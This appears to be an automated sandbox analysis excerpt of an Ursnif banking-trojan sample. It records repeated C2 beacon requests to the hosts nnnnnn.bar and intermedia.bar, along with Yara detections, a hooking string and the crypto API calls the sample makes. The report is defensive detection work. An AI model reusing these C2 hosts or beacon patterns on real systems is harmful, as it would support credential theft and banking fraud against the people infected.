Source: global traffic	HTTP traffic detected: GET /drew/rZhj41YDho07lhy6L/M1X3L7i5NYcb/L97B85uQB2S/FgEOSK5V3ThOeD/DNveDYBQ28rrD189AqdhV/NKmujzZRyKnvgk9X/jJycgfrwG7wGnTM/t0o4CG41V2FNyu0GLy/bX7ssXMeo/UWhkb9iDXiv7_2FmjJT_/2BbFzlZ57KEgbgo809d/Uxn0hqzApOfNaraCb_2B8I/XDKMEUTj4OH01/bQL_2F9g/6BnzcAU3n1P9DuuhCdq2z4A/pcEwd.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /drew/RIWYrzIoHP_2FLrdN/XJ_2BwD4EEew/6sYapNOqqjb/XWEflp4K5kHXkq/EIbryuQTJReV3fXYLSoiW/TIliiVRGIc01fzYH/Bn5ukiFg4DUJLyQ/1rmOsCaKf0G_2BUfXi/in6ecd1lV/GkhZR4sJ9fujnaCVTs1B/mnY6PTmL1ZVmiKTWjQI/AkdYwwVp3A4GBnLp0zxYLt/aP4I1SQJrUv6t/rokWtZ5P/95kl37fn4wnhNVnKrJRMavm/Bbn.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /drew/RIWYrzIoHP_2FLrdN/XJ_2BwD4EEew/6sYapNOqqjb/XWEflp4K5kHXkq/EIbryuQTJReV3fXYLSoiW/TIliiVRGIc01fzYH/Bn5ukiFg4DUJLyQ/1rmOsCaKf0G_2BUfXi/in6ecd1lV/GkhZR4sJ9fujnaCVTs1B/mnY6PTmL1ZVmiKTWjQI/AkdYwwVp3A4GBnLp0zxYLt/aP4I1SQJrUv6t/rokWtZ5P/95kl37fn4wnhNVnKrJRMavm/Bbn.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /drew/rZhj41YDho07lhy6L/M1X3L7i5NYcb/L97B85uQB2S/FgEOSK5V3ThOeD/DNveDYBQ28rrD189AqdhV/NKmujzZRyKnvgk9X/jJycgfrwG7wGnTM/t0o4CG41V2FNyu0GLy/bX7ssXMeo/UWhkb9iDXiv7_2FmjJT_/2BbFzlZ57KEgbgo809d/Uxn0hqzApOfNaraCb_2B8I/XDKMEUTj4OH01/bQL_2F9g/6BnzcAU3n1P9DuuhCdq2z4A/pcEwd.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /drew/RIWYrzIoHP_2FLrdN/XJ_2BwD4EEew/6sYapNOqqjb/XWEflp4K5kHXkq/EIbryuQTJReV3fXYLSoiW/TIliiVRGIc01fzYH/Bn5ukiFg4DUJLyQ/1rmOsCaKf0G_2BUfXi/in6ecd1lV/GkhZR4sJ9fujnaCVTs1B/mnY6PTmL1ZVmiKTWjQI/AkdYwwVp3A4GBnLp0zxYLt/aP4I1SQJrUv6t/rokWtZ5P/95kl37fn4wnhNVnKrJRMavm/Bbn.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /drew/rZhj41YDho07lhy6L/M1X3L7i5NYcb/L97B85uQB2S/FgEOSK5V3ThOeD/DNveDYBQ28rrD189AqdhV/NKmujzZRyKnvgk9X/jJycgfrwG7wGnTM/t0o4CG41V2FNyu0GLy/bX7ssXMeo/UWhkb9iDXiv7_2FmjJT_/2BbFzlZ57KEgbgo809d/Uxn0hqzApOfNaraCb_2B8I/XDKMEUTj4OH01/bQL_2F9g/6BnzcAU3n1P9DuuhCdq2z4A/pcEwd.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /drew/RIWYrzIoHP_2FLrdN/XJ_2BwD4EEew/6sYapNOqqjb/XWEflp4K5kHXkq/EIbryuQTJReV3fXYLSoiW/TIliiVRGIc01fzYH/Bn5ukiFg4DUJLyQ/1rmOsCaKf0G_2BUfXi/in6ecd1lV/GkhZR4sJ9fujnaCVTs1B/mnY6PTmL1ZVmiKTWjQI/AkdYwwVp3A4GBnLp0zxYLt/aP4I1SQJrUv6t/rokWtZ5P/95kl37fn4wnhNVnKrJRMavm/Bbn.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /drew/rZhj41YDho07lhy6L/M1X3L7i5NYcb/L97B85uQB2S/FgEOSK5V3ThOeD/DNveDYBQ28rrD189AqdhV/NKmujzZRyKnvgk9X/jJycgfrwG7wGnTM/t0o4CG41V2FNyu0GLy/bX7ssXMeo/UWhkb9iDXiv7_2FmjJT_/2BbFzlZ57KEgbgo809d/Uxn0hqzApOfNaraCb_2B8I/XDKMEUTj4OH01/bQL_2F9g/6BnzcAU3n1P9DuuhCdq2z4A/pcEwd.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /drew/RIWYrzIoHP_2FLrdN/XJ_2BwD4EEew/6sYapNOqqjb/XWEflp4K5kHXkq/EIbryuQTJReV3fXYLSoiW/TIliiVRGIc01fzYH/Bn5ukiFg4DUJLyQ/1rmOsCaKf0G_2BUfXi/in6ecd1lV/GkhZR4sJ9fujnaCVTs1B/mnY6PTmL1ZVmiKTWjQI/AkdYwwVp3A4GBnLp0zxYLt/aP4I1SQJrUv6t/rokWtZ5P/95kl37fn4wnhNVnKrJRMavm/Bbn.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /drew/rZhj41YDho07lhy6L/M1X3L7i5NYcb/L97B85uQB2S/FgEOSK5V3ThOeD/DNveDYBQ28rrD189AqdhV/NKmujzZRyKnvgk9X/jJycgfrwG7wGnTM/t0o4CG41V2FNyu0GLy/bX7ssXMeo/UWhkb9iDXiv7_2FmjJT_/2BbFzlZ57KEgbgo809d/Uxn0hqzApOfNaraCb_2B8I/XDKMEUTj4OH01/bQL_2F9g/6BnzcAU3n1P9DuuhCdq2z4A/pcEwd.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /drew/QsS2jHAM_/2BwJZccmdp5m9iHVP9BE/Hy_2Bb24NYz6UUYImCo/zrhZsMNoFc_2FvJseSFb87/xXKn3PzxfNPne/1IWtDw4e/zao8w3_2FqS1tUowEpdILrG/AQc_2F2CTQ/Kg84n698KmhLQ87R8/T3KY8S12PpxD/H69sMspGVxv/is2jKybUtpc7W2/tjpg5c_2BM2CHgmR9sa3h/opwZ5u985b9SYlvV/9nvFId2LU1FOjTP/3gzCgoFC/zqOGqAVh/K.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: intermedia.barConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /drew/8GCWuTw3vFr_2BaLQHxEj/S2mZ_2Bs1ztZVt4J/tWEHNc4XanBwmnu/I2msIqz_2B6GZdxr2f/MEql68nFt/nYxdw4RZXpFaqbijhmkw/0I3UhZ9PcRsKOEspkq8/7YzXu2AOi0fYDlLet1LtxN/Z8j42Kwsx6Kh3/NutAzqvZ/KcYW58Xr4T1MQTJAJB2YAhX/pcuj3_2Fx_/2BQrkwFa603_2B68s/I0dGq_2F0eCx/w74Pufb9K3x/hd2DOR_2F/4NgLz6GD.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: intermedia.barConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /drew/rZhj41YDho07lhy6L/M1X3L7i5NYcb/L97B85uQB2S/FgEOSK5V3ThOeD/DNveDYBQ28rrD189AqdhV/NKmujzZRyKnvgk9X/jJycgfrwG7wGnTM/t0o4CG41V2FNyu0GLy/bX7ssXMeo/UWhkb9iDXiv7_2FmjJT_/2BbFzlZ57KEgbgo809d/Uxn0hqzApOfNaraCb_2B8I/XDKMEUTj4OH01/bQL_2F9g/6BnzcAU3n1P9DuuhCdq2z4A/pcEwd.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /drew/7DgipjE3bmmbRPyMp6s7/BgNwib2SV4cWPRKen15/S3RnGOSvPDrV_2BWCH85t5/rAG3EMntvxQhd/z09P1P0N/JYWuQ1lZWbrjgAwzu9HwDiH/z_2BLAvnX1/8oE3_2BrbVuTg5XgN/fFGGve_2BZ6j/OLfiN5cTTiP/UJGuomraiJd058/bcTFQPP7iErfusSSsGsOL/4opclstIlc_2FqAf/jUg_2FZVQoG_2B4/nAlRxJiE1eByE2QqI0/X5WHEnb3X/D.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /drew/7DgipjE3bmmbRPyMp6s7/BgNwib2SV4cWPRKen15/S3RnGOSvPDrV_2BWCH85t5/rAG3EMntvxQhd/z09P1P0N/JYWuQ1lZWbrjgAwzu9HwDiH/z_2BLAvnX1/8oE3_2BrbVuTg5XgN/fFGGve_2BZ6j/OLfiN5cTTiP/UJGuomraiJd058/bcTFQPP7iErfusSSsGsOL/4opclstIlc_2FqAf/jUg_2FZVQoG_2B4/nAlRxJiE1eByE2QqI0/X5WHEnb3X/D.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /drew/pgrqzdCpp_2BoR9YKjM/4PKdL3no8Cmh2eLar0r1e3/w1sLhdA1An4Ma/aD5fsj0e/RzdEMRLJALIuVpZbCXTm33B/7rNoIMP9VG/c8tgfuTkxT7ByPtRb/j_2BUePUN_2B/Bl7nkFpwFGb/eE5q1GPA2rANKR/WLm_2BrotZpp1pDZVWLMK/C4Hf3n12wJLU8uUR/lXrXiW51IsTlZ0K/b1wCGwV9dM41Za02jV/WmUTzni7Y/s2rU_2FN61u_2BQF/kOM.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /drew/pgrqzdCpp_2BoR9YKjM/4PKdL3no8Cmh2eLar0r1e3/w1sLhdA1An4Ma/aD5fsj0e/RzdEMRLJALIuVpZbCXTm33B/7rNoIMP9VG/c8tgfuTkxT7ByPtRb/j_2BUePUN_2B/Bl7nkFpwFGb/eE5q1GPA2rANKR/WLm_2BrotZpp1pDZVWLMK/C4Hf3n12wJLU8uUR/lXrXiW51IsTlZ0K/b1wCGwV9dM41Za02jV/WmUTzni7Y/s2rU_2FN61u_2BQF/kOM.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /drew/7DgipjE3bmmbRPyMp6s7/BgNwib2SV4cWPRKen15/S3RnGOSvPDrV_2BWCH85t5/rAG3EMntvxQhd/z09P1P0N/JYWuQ1lZWbrjgAwzu9HwDiH/z_2BLAvnX1/8oE3_2BrbVuTg5XgN/fFGGve_2BZ6j/OLfiN5cTTiP/UJGuomraiJd058/bcTFQPP7iErfusSSsGsOL/4opclstIlc_2FqAf/jUg_2FZVQoG_2B4/nAlRxJiE1eByE2QqI0/X5WHEnb3X/D.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /drew/pgrqzdCpp_2BoR9YKjM/4PKdL3no8Cmh2eLar0r1e3/w1sLhdA1An4Ma/aD5fsj0e/RzdEMRLJALIuVpZbCXTm33B/7rNoIMP9VG/c8tgfuTkxT7ByPtRb/j_2BUePUN_2B/Bl7nkFpwFGb/eE5q1GPA2rANKR/WLm_2BrotZpp1pDZVWLMK/C4Hf3n12wJLU8uUR/lXrXiW51IsTlZ0K/b1wCGwV9dM41Za02jV/WmUTzni7Y/s2rU_2FN61u_2BQF/kOM.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /drew/7DgipjE3bmmbRPyMp6s7/BgNwib2SV4cWPRKen15/S3RnGOSvPDrV_2BWCH85t5/rAG3EMntvxQhd/z09P1P0N/JYWuQ1lZWbrjgAwzu9HwDiH/z_2BLAvnX1/8oE3_2BrbVuTg5XgN/fFGGve_2BZ6j/OLfiN5cTTiP/UJGuomraiJd058/bcTFQPP7iErfusSSsGsOL/4opclstIlc_2FqAf/jUg_2FZVQoG_2B4/nAlRxJiE1eByE2QqI0/X5WHEnb3X/D.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /drew/pgrqzdCpp_2BoR9YKjM/4PKdL3no8Cmh2eLar0r1e3/w1sLhdA1An4Ma/aD5fsj0e/RzdEMRLJALIuVpZbCXTm33B/7rNoIMP9VG/c8tgfuTkxT7ByPtRb/j_2BUePUN_2B/Bl7nkFpwFGb/eE5q1GPA2rANKR/WLm_2BrotZpp1pDZVWLMK/C4Hf3n12wJLU8uUR/lXrXiW51IsTlZ0K/b1wCGwV9dM41Za02jV/WmUTzni7Y/s2rU_2FN61u_2BQF/kOM.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /drew/7DgipjE3bmmbRPyMp6s7/BgNwib2SV4cWPRKen15/S3RnGOSvPDrV_2BWCH85t5/rAG3EMntvxQhd/z09P1P0N/JYWuQ1lZWbrjgAwzu9HwDiH/z_2BLAvnX1/8oE3_2BrbVuTg5XgN/fFGGve_2BZ6j/OLfiN5cTTiP/UJGuomraiJd058/bcTFQPP7iErfusSSsGsOL/4opclstIlc_2FqAf/jUg_2FZVQoG_2B4/nAlRxJiE1eByE2QqI0/X5WHEnb3X/D.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /drew/pgrqzdCpp_2BoR9YKjM/4PKdL3no8Cmh2eLar0r1e3/w1sLhdA1An4Ma/aD5fsj0e/RzdEMRLJALIuVpZbCXTm33B/7rNoIMP9VG/c8tgfuTkxT7ByPtRb/j_2BUePUN_2B/Bl7nkFpwFGb/eE5q1GPA2rANKR/WLm_2BrotZpp1pDZVWLMK/C4Hf3n12wJLU8uUR/lXrXiW51IsTlZ0K/b1wCGwV9dM41Za02jV/WmUTzni7Y/s2rU_2FN61u_2BQF/kOM.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /drew/7DgipjE3bmmbRPyMp6s7/BgNwib2SV4cWPRKen15/S3RnGOSvPDrV_2BWCH85t5/rAG3EMntvxQhd/z09P1P0N/JYWuQ1lZWbrjgAwzu9HwDiH/z_2BLAvnX1/8oE3_2BrbVuTg5XgN/fFGGve_2BZ6j/OLfiN5cTTiP/UJGuomraiJd058/bcTFQPP7iErfusSSsGsOL/4opclstIlc_2FqAf/jUg_2FZVQoG_2B4/nAlRxJiE1eByE2QqI0/X5WHEnb3X/D.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /drew/pgrqzdCpp_2BoR9YKjM/4PKdL3no8Cmh2eLar0r1e3/w1sLhdA1An4Ma/aD5fsj0e/RzdEMRLJALIuVpZbCXTm33B/7rNoIMP9VG/c8tgfuTkxT7ByPtRb/j_2BUePUN_2B/Bl7nkFpwFGb/eE5q1GPA2rANKR/WLm_2BrotZpp1pDZVWLMK/C4Hf3n12wJLU8uUR/lXrXiW51IsTlZ0K/b1wCGwV9dM41Za02jV/WmUTzni7Y/s2rU_2FN61u_2BQF/kOM.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /drew/7DgipjE3bmmbRPyMp6s7/BgNwib2SV4cWPRKen15/S3RnGOSvPDrV_2BWCH85t5/rAG3EMntvxQhd/z09P1P0N/JYWuQ1lZWbrjgAwzu9HwDiH/z_2BLAvnX1/8oE3_2BrbVuTg5XgN/fFGGve_2BZ6j/OLfiN5cTTiP/UJGuomraiJd058/bcTFQPP7iErfusSSsGsOL/4opclstIlc_2FqAf/jUg_2FZVQoG_2B4/nAlRxJiE1eByE2QqI0/X5WHEnb3X/D.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /drew/pgrqzdCpp_2BoR9YKjM/4PKdL3no8Cmh2eLar0r1e3/w1sLhdA1An4Ma/aD5fsj0e/RzdEMRLJALIuVpZbCXTm33B/7rNoIMP9VG/c8tgfuTkxT7ByPtRb/j_2BUePUN_2B/Bl7nkFpwFGb/eE5q1GPA2rANKR/WLm_2BrotZpp1pDZVWLMK/C4Hf3n12wJLU8uUR/lXrXiW51IsTlZ0K/b1wCGwV9dM41Za02jV/WmUTzni7Y/s2rU_2FN61u_2BQF/kOM.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: nnnnnn.barConnection: Keep-AliveCache-Control: no-cache

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected Ursnif

Source: Yara match	File source: 00000005.00000003.349703615.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.343910189.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.349753525.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.348956479.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.344026783.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.343809632.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.503813220.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.348909317.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.691343134.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.350624974.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.350468495.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.813030577.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.349673542.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.343983183.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.343884833.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.811764188.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.349765761.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.343969010.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.811066205.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.350524992.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.349774706.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.350610044.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.349722283.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.505253975.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.350578118.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.348881206.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.348997305.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.350596775.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.343764685.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.350398147.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.343941350.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.349738190.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.349603405.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.350426132.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.349008394.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.502184053.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.811636892.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.348935901.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.348822890.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.348974214.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 7132, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 784, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 2276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6460, type: MEMORYSTR

Source: loaddll32.exe, 00000001.00000002.809447258.00000000010EB000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud

Yara detected Ursnif

Source: Yara match	File source: 00000005.00000003.349703615.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.343910189.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.349753525.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.348956479.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.344026783.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.343809632.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.503813220.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.348909317.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.691343134.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.350624974.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.350468495.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.813030577.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.349673542.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.343983183.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.343884833.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.811764188.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.349765761.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.343969010.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.811066205.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.350524992.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.349774706.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.350610044.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.349722283.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.505253975.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.350578118.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.348881206.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.348997305.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.350596775.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.343764685.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.350398147.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.343941350.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.349738190.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.349603405.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.350426132.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.349008394.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.502184053.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.811636892.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.348935901.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.348822890.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.348974214.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 7132, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 784, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 2276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6460, type: MEMORYSTR

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_010C4872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_04F94872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04214872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
